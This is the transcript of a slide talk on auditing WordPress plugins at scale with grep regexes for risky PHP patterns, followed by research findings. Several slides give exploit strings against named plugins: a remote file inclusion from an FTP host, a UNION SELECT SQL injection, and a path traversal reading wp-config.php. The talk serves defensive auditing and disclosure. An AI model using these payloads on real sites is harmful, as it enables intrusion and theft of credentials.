Presentation is loading. Please wait.

Presentation is loading. Please wait.

Large-scale application security Charlie Eriksen.

Published byNoah Weaver Modified over 9 years ago

Similar presentations

Presentation on theme: "Large-scale application security Charlie Eriksen."— Presentation transcript:

1 Large-scale application security Charlie Eriksen

2

3

4

5

6 Agenda Define the problem space Testing and auditing techniques Step 1 – Define target Step 2 – Understand the target Step 3 – Find critical/high-risk code paths to review Step 4 – Review and test Step 5 – Asses your findings and iterate Future challenges ▫Locating the absence of CSRF protection ▫Real-time alerting

7 Goals The ability to take a large amount of code and audit it for vulnerabilities Prioritize time spent in an audit based on risk Spend as little time as possible to find as many vulnerabilities as possible

8 Inspiration

9

10

11 Problem space

12 Vulnerability classes and mitigation Systematic vulnerabilities Framework Code review Manual/Automatic testing Business/design logic Code review Manual testing

13 What we’re not trying to solve Reviewing business logic Pin-point accuracy of vulnerabilities (Not really) reviewing for the absence of… ▫We’ll look at my attempt at reviewing for the absence of CSRF protection later!

14 Testing techniques White box Black box The sweet spot

15 White box Black box Pros ▫Not restricted by your discovery phase ▫Gets you straight to where interesting things happen Cons ▫Some code can be too hard to statically analyze ▫Things may hide in plain sight Pros ▫Some parts can be automated ▫Allows you to observe behavior ▫Will uncover the most obvious flaws Cons ▫Uncovering some bugs can be expensive ▫Special code-paths may never be executed

16 Testing techniques

17 Audit ROI This is probably true for most companies ▫Large number of applications ▫Lots of legacy ▫Not enough time to audit all thoroughly Consider: ▫What do you not know/Are there risks you’re not aware of? ▫What is your vulnerability tolerance? ▫What vulnerabilities have the highest impact? ▫What vulnerabilities are most likely to be discovered?

18 Audit ROI Hard Easy High Low $$$ Good! Are you google? If not, wasted time/money

19

20 Candidate point strategy Fastest way to identify a lot of vulnerabilities Starts with identifying: ▫Points with side effects ▫Known vulnerable patterns Then back-tracing

21

22 Step 1 – Define target Find a target ▫In-house? ▫Public projects?  Plugins! Obtain source code

23 Wordpress example

24 Step 2 - Understand the target Learn the language Internalize OWASP top 10 Observe the framework and language ▫Dangerous functions ▫Mitigation techniques Find commonly vulnerable code patterns

25 PHP/Wordpress important functions A good list exists here for PHP: http://stackoverflow.com/questions/3115559/ex ploitable-php-functions http://stackoverflow.com/questions/3115559/ex ploitable-php-functions Highlights: ▫include/require ▫system/exec/shell_exec ▫eval Wordpress specific: ▫wpdb

26 Step 3 – Find critical/high-risk code paths to review Higher risk code paths is where you’ll want to spend more time Determine your critical functionality and assets Examples might be: ▫System calls ▫Database access ▫File system access ▫Web-specific things, forms, markup output ▫Encoding(base64) ▫Cryptographic usage(md5!?) These will be our candidate points

27 Good PHP regexes (include|require).*\$_(POST|GET|REQUEST) file_get_contents.*\$_(POST|GET|REQUEST) (eval|exec|system|shell_exec).*\$_(POST|GET|REQ UEST) SELECT.* FROM.* \$_(POST|GET|REQUEST) (echo|print).*\$_(POST|GET|REQUEST)

28

29 Step 4 – Review and test Start by casting the net wide on a project As you learn more about it, start being more specific and reduce noise Learn to review code at a glance High risk vulnerabilities are usually easily seen at a glance

30

31

32 Example 1

33 Example 1 – Cryptographic md5\s?\(.*\$_(GET|POST|REQUEST)

34

35 Example 1 – Cryptographic exploit

36 Example 2

37 Example 2 – File inclusion (include|require).*\$_(POST|GET|REQUEST)

38

39 Example 2 – File inclusion /wordpress/wp-content/plugins/zingiri-web- shop/fws/download.php?abspath=ftp://hello:thisisdog@ example.com/

40 Example 3

41 Example 3 – SQL Injection SELECT.* FROM.* \$_(POST|GET|REQUEST)

42

43 Example 3 – SQL Injection /wordpress/wp-content/plugins/all-video- gallery/xml/playlist.php?vid=2 UNION SELECT 1, 2, user(), @@version, 5, 6, 7, 8, 9, 10, database(), 12, 13, 14, 15, 16, 17, 18

44 Example 4

45 Example 4 – File disclosure file_get_contents.*\$_(POST|GET|REQUEST)

46

47 Example 4 – File disclosure /wordpress/wp-content/plugins/google-document- embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp- config.php

48 Step 5 – Asses your findings and iterate Steps to take ▫Assess risk ▫Do root cause analysis ▫Consider if there is likely to be more vulnerabilities of this type ▫Find out if there are steps that can be taken to mitigate the class of vulnerability at large Find next steps to improve your ROI ▫Are you coming close to your risk tolerance? ▫Are there still unknowns? ▫Are there other higher-risk areas(ROI?) ▫Have you addressed the most discoverable bugs?

49 Methodology All vulnerabilities found using this method All vulnerabilities submitted to Secunia SVCRP ▫Sweet program, check it out Data based on their advisories ▫Download numbers pulled manually

50 Research findings 24 plugins ~2 million downloads 66 vulnerabilities

51 Downloads

52 Vulnerabilities

53 Time to patch 6 advisories without patch 34 days to patch on average

54 Future challenges – Locate the absence of mitigation Simple question: How do you accurately pin- point for the absence of a vulnerability mitigation? Secure by default helps, but can’t be assumed

55 Locating the absence of CSRF protection

56 Results 30 plugins 14.000.000 downloads

57 Plugin downloads 455k downloads on average

58 Future challenges – Vulnerability alerting We know how to look for vulnerabilities You have to keep up with current development Reviewing the same code over and over again stops paying off How do we make a machine look for things to review in real-ish time?

59 Conclusions Intelligent grep use can uncover vulnerabilities Using your understanding of a language and framework serves as a great starting point for code reviews By reviewing critical code-paths for mechanical vulnerabilities, you can cover a lot of ground in short time Systematic vulnerabilities exist and can be uncovered en masse quite trivially Use root cause analysis appropriately and fix the problem rather than the symptom

60 Bonus example!

61 array_merge\(.*\$_(POST|GET|REQUEST)

62

63 Press button, receive answers www.ceriksen.comwww.ceriksen.com - @charlieeriksen

Download ppt "Large-scale application security Charlie Eriksen."

Similar presentations

Attention (your target market) !. Are you (their problem) ?

Attention (your target market) !. Are you (their problem) ?
Test process essentials Riitta Viitamäki, 14.4.2004

Test process essentials Riitta Viitamäki,
© 2008 All Right Reserved Fortify Software Inc. Hybrid 2.0 – In search of the holy grail… A Talk for OWASP BeNeLux by Roger Thornton Founder/CTO Fortify.

© 2008 All Right Reserved Fortify Software Inc. Hybrid 2.0 – In search of the holy grail… A Talk for OWASP BeNeLux by Roger Thornton Founder/CTO Fortify.
Engineering Secure Software. The Power of Source Code  White box testing Testers have intimate knowledge of the specifications, design, Often done by.

Engineering Secure Software. The Power of Source Code  White box testing Testers have intimate knowledge of the specifications, design, Often done by.
©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.

©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.
Fuzzing Dan Fleck CS 469: Security Engineering Sources:

Fuzzing Dan Fleck CS 469: Security Engineering Sources:
Software Testing. Overview Definition of Software Testing Problems with Testing Benefits of Testing Effective Methods for Testing.

Software Testing. Overview Definition of Software Testing Problems with Testing Benefits of Testing Effective Methods for Testing.
©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane
1 Psych 5500/6500 The t Test for a Single Group Mean (Part 5): Outliers Fall, 2008.

1 Psych 5500/6500 The t Test for a Single Group Mean (Part 5): Outliers Fall, 2008.
Chapter 3.1 Teams and Processes. 2 Programming Teams In the 1980s programmers developed the whole game (and did the art and sounds too!) Now programmers.

Chapter 3.1 Teams and Processes. 2 Programming Teams In the 1980s programmers developed the whole game (and did the art and sounds too!) Now programmers.
Pertemuan 11-12 Matakuliah: A0214/Audit Sistem Informasi Tahun: 2007.

Pertemuan Matakuliah: A0214/Audit Sistem Informasi Tahun: 2007.
Principle of Functional Verification Chapter 1~3 Presenter : Fu-Ching Yang.

Principle of Functional Verification Chapter 1~3 Presenter : Fu-Ching Yang.
Static Code Analysis and Governance Effectively Using Source Code Scanners.

Static Code Analysis and Governance Effectively Using Source Code Scanners.
BUILDING A SECURE STANDARD LIBRARY Information Assurance Project I MN121051 Tajuddin hj. Tappe Supervisor Mdm. Rasimah Che Mohd Yusoff ASP.NET TECHNOLOGY.

BUILDING A SECURE STANDARD LIBRARY Information Assurance Project I MN Tajuddin hj. Tappe Supervisor Mdm. Rasimah Che Mohd Yusoff ASP.NET TECHNOLOGY.
Get Complete IT Compliance: Reduce Risk and Cost Jonathan CISO, Qualys Seth Automation Specialist, BMC.

Get Complete IT Compliance: Reduce Risk and Cost Jonathan CISO, Qualys Seth Automation Specialist, BMC.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Terms: Test (Case) vs. Test Suite

Terms: Test (Case) vs. Test Suite
Introduction Our Topic: Mobile Security Why is mobile security important?

Introduction Our Topic: Mobile Security Why is mobile security important?
Brad Baker CS526 May 7 th, 2008 5/7/2008 1. 1. Project goals 2. Test Environment 3. The Problem 4. Some Solutions 5. ModSecurity Overview 6. ModSecurity.

Brad Baker CS526 May 7 th, /7/ Project goals 2. Test Environment 3. The Problem 4. Some Solutions 5. ModSecurity Overview 6. ModSecurity.
1. Topics to be discussed Introduction Objectives Testing Life Cycle Verification Vs Validation Testing Methodology Testing Levels 2.

1. Topics to be discussed Introduction Objectives Testing Life Cycle Verification Vs Validation Testing Methodology Testing Levels 2.

Similar presentations

Ads by Google